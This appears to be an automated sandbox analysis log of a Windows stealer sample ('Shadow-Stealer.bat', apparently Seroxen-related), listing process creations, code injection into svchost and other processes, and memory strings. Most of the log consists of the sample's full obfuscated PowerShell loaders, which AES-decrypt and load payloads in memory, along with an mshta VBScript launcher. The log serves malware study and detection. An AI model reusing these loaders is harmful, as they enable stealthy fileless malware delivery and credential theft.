            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A510000
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Thread register set: target process: 3940
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Thread register set: target process: 5576
Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 1088
Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 6336
Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 5204
Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 3784
Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 3268
Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 5112
Source: C:\Windows\$sxr-powershell.exe | Thread register set: target process: 352
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe "shadow-stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pxqky($ammuc){ $qaumi=[system.security.cryptography.aes]::create(); $qaumi.mode=[system.security.cryptography.ciphermode]::cbc; $qaumi.padding=[system.security.cryptography.paddingmode]::pkcs7; $qaumi.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('loy14lths3sgwk7zmlm+u1lasbd9l9+grtu5mlzp2mm='); $qaumi.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ls2ypgjebrtrew/fjyl2oq=='); $lsyot=$qaumi.createdecryptor(); $return_var=$lsyot.transformfinalblock($ammuc, 0, $ammuc.length); $lsyot.dispose(); $qaumi.dispose(); $return_var;}function yapup($ammuc){ $bpqpy=new-object system.io.memorystream(,$ammuc); $muxyl=new-object system.io.memorystream; $qrzer=new-object system.io.compression.gzipstream($bpqpy, [io.compression.compressionmode]::decompress); $qrzer.copyto($muxyl); $qrzer.dispose(); $bpqpy.dispose(); $muxyl.dispose(); $muxyl.toarray();}function davur($ammuc,$oapri){ $tirdu=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$ammuc); $cmozy=$tirdu.entrypoint; $cmozy.invoke($null, $oapri);}$agzco=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\shadow-stealer.bat').split([environment]::newline);foreach ($xwgwp in $agzco) { if ($xwgwp.startswith('seroxen')) { $gzelj=$xwgwp.substring(7); break; }}$paqqy=[string[]]$gzelj.split('\');$ahdvx=yapup (pxqky ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($paqqy[0])));$qbiwj=yapup (pxqky ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($paqqy[1])));davur $qbiwj (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));davur $ahdvx (,[string[]] ('', 'idtznccsreqaeejvuwzutuitglivmfheulstnnuhslwymmxaqk', 'lkizmjcsatthedeyossawnzmofyqejpcytnoxqiuoblpdohijn'));
            Source: unknownProcess created: C:\Windows\$sxr-mshta.exe c:\windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'vb'+'sc'+'ri'+'pt'+'\x22>'+'se'+'t\x20'+'ob'+'js'+'he'+'ll'+'\x20='+'\x20c'+'re'+'at'+'eo'+'bj'+'ec'+'t('+'\x22w'+'sc'+'ri'+'pt'+'.s'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'sh'+'el'+'l.'+'ru'+'n\x20'+'\x22c:\\windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptouybjvuvgcojtiwn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe c:\windows\$sxr-powershell.exe -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command function vohzf($lwtxx){ $xcaug=[system.security.cryptography.aes]::create(); $xcaug.mode=[system.security.cryptography.ciphermode]::cbc; $xcaug.padding=[system.security.cryptography.paddingmode]::pkcs7; $xcaug.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0='); $xcaug.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg=='); $ctnvz=$xcaug.('rotpyrcedetaerc'[-1..-15] -join '')(); $omfgf=$ctnvz.('kcolblanifmrofsnart'[-1..-19] -join '')($lwtxx, 0, $lwtxx.length); $ctnvz.dispose(); $xcaug.dispose(); $omfgf;}function nnkof($lwtxx){ $abmbt=new-object system.io.memorystream(,$lwtxx); $fswzf=new-object system.io.memorystream; $zwqus=new-object system.io.compression.gzipstream($abmbt, [io.compression.compressionmode]::decompress); $zwqus.copyto($fswzf); $zwqus.dispose(); $abmbt.dispose(); $fswzf.dispose(); $fswzf.toarray();}function vzvjz($lwtxx,$kawoq){ $kxipu=[system.reflection.assembly]::load([byte[]]$lwtxx); $oppdg=$kxipu.entrypoint; $oppdg.invoke($null, $kawoq);}$xcaug1 = new-object system.security.cryptography.aesmanaged;$xcaug1.mode = [system.security.cryptography.ciphermode]::cbc;$xcaug1.padding = [system.security.cryptography.paddingmode]::pkcs7;$xcaug1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0=');$xcaug1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg==');$qsfqp = $xcaug1.('rotpyrcedetaerc'[-1..-15] -join '')();$umirz = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('2twxifmv1jwyz0b8bphefa==');$umirz = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($umirz, 0, $umirz.length);$umirz = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] 
-join '')($umirz);$pyyqa = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('p05ztwckumfos2q8ryos+fixy2dyphhbyygl6z+cec8=');$pyyqa = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($pyyqa, 0, $pyyqa.length);$pyyqa = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($pyyqa);$roofg = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('sy8hcjtfka/mf4hph+go6g==');$roofg = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($roofg, 0, $roofg.length);$roofg = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($roofg);$tgmgc = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('buxxfqry1rop0b/roy4prlv7xh6eywkql6uot7vtjfzgnba4dmwvrz0rekh6tsw5e4dar7n8ykyorgfhmfzdschzoelrp0gmf7penq75exbqf+3j4n1ljy1xzypyejfwvjgbjvqe3cpowhnqattyty/6ujgytqqhsjigqqdcvjycexpvlg1ktaidhwbcleghzlplvk+ntj2pyl6wysfa3i8rptdz3r9ivjabt8a6toqzrs2q9nm/2k1/irfutdkvpptyy9cd0jq4mto7gdnvluac8kjm0rawso8rwa3zkjnybbv03aq6fif9zugda03cb0yo24aife5afn+zogdlktwrsyyivpjarzdcbblxkhprynayhbm2a5pmzva2gac2+o8odd180z07f5zl3mywto8
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "c:\windows\$sxr-powershell.exe" -nologo -noprofile -noninteractive -windowstyle hidden -executionpolicy bypass -command [system.diagnostics.process]::getprocessbyid(6400).waitforexit();[system.threading.thread]::sleep(5000); function vohzf($lwtxx){ $xcaug=[system.security.cryptography.aes]::create(); $xcaug.mode=[system.security.cryptography.ciphermode]::cbc; $xcaug.padding=[system.security.cryptography.paddingmode]::pkcs7; $xcaug.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0='); $xcaug.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg=='); $ctnvz=$xcaug.('rotpyrcedetaerc'[-1..-15] -join '')(); $omfgf=$ctnvz.('kcolblanifmrofsnart'[-1..-19] -join '')($lwtxx, 0, $lwtxx.length); $ctnvz.dispose(); $xcaug.dispose(); $omfgf;}function nnkof($lwtxx){ $abmbt=new-object system.io.memorystream(,$lwtxx); $fswzf=new-object system.io.memorystream; $zwqus=new-object system.io.compression.gzipstream($abmbt, [io.compression.compressionmode]::decompress); $zwqus.copyto($fswzf); $zwqus.dispose(); $abmbt.dispose(); $fswzf.dispose(); $fswzf.toarray();}function vzvjz($lwtxx,$kawoq){ $kxipu=[system.reflection.assembly]::load([byte[]]$lwtxx); $oppdg=$kxipu.entrypoint; $oppdg.invoke($null, $kawoq);}$xcaug1 = new-object system.security.cryptography.aesmanaged;$xcaug1.mode = [system.security.cryptography.ciphermode]::cbc;$xcaug1.padding = [system.security.cryptography.paddingmode]::pkcs7;$xcaug1.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('tm3zfpdkmzynpmflqy1uvewzay6dhwgl3hpqgmb2tk0=');$xcaug1.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zumramter/3la6uhcth1gg==');$qsfqp = $xcaug1.('rotpyrcedetaerc'[-1..-15] -join '')();$umirz = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('2twxifmv1jwyz0b8bphefa==');$umirz = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join 
'')($umirz, 0, $umirz.length);$umirz = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($umirz);$pyyqa = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('p05ztwckumfos2q8ryos+fixy2dyphhbyygl6z+cec8=');$pyyqa = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($pyyqa, 0, $pyyqa.length);$pyyqa = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($pyyqa);$roofg = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('sy8hcjtfka/mf4hph+go6g==');$roofg = $qsfqp.('kcolblanifmrofsnart'[-1..-19] -join '')($roofg, 0, $roofg.length);$roofg = [system.text.encoding]::('8ftu'[-1..-4] -join '').('gnirtsteg'[-1..-9] -join '')($roofg);$tgmgc = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('buxxfqry1rop0b/roy4prlv7xh6eywkql6uot7vtjfzgnba4dmwvrz0rekh6tsw5e4dar7n8ykyorgfhmfzdschzoelrp0gmf7penq75exbqf+3j4n1ljy1xzypyejfwvjgbjvqe3cpowhnqattyty/6ujgytqqhsjigqqdcvjycexpvlg1ktaidhwbcleghzlplvk+ntj2pyl6wysfa3i8rptdz3r9ivjabt8a6toqzrs2q9nm/2k1/irfutdkvpptyy9cd0jq4mto7gdnvluac8kjm0rawso8rwa3zkjnyb
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe "Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Jump to behavior
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba}
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16}
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87}
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9}
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe | Process created: unknown unknown
Source: C:\Windows\$sxr-mshta.exe | Process created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8Jump to behavior
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6}
Source: C:\Windows\$sxr-powershell.exe | Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYB
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc}
Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251}
Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_00401BC6 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_00401BC6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_00401BC6 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_00401BC6
Source: winlogon.exe, 00000016.00000000.2484058011.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3372155611.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.2490600186.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: dwm.exe, 0000001A.00000002.3406365855.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000001A.00000000.2498836739.000001D159439000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 00000016.00000000.2484058011.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3372155611.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.2490600186.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000016.00000000.2484058011.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3372155611.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.2490600186.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 00000016.00000000.2484058011.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3372155611.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.2490600186.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\$sxr-cmd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,13_2_00007FF7137F51EC
Source: C:\Windows\$sxr-cmd.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,13_2_00007FF7137E6EE4
Source: C:\Windows\$sxr-cmd.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,13_2_00007FF7137F3140
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
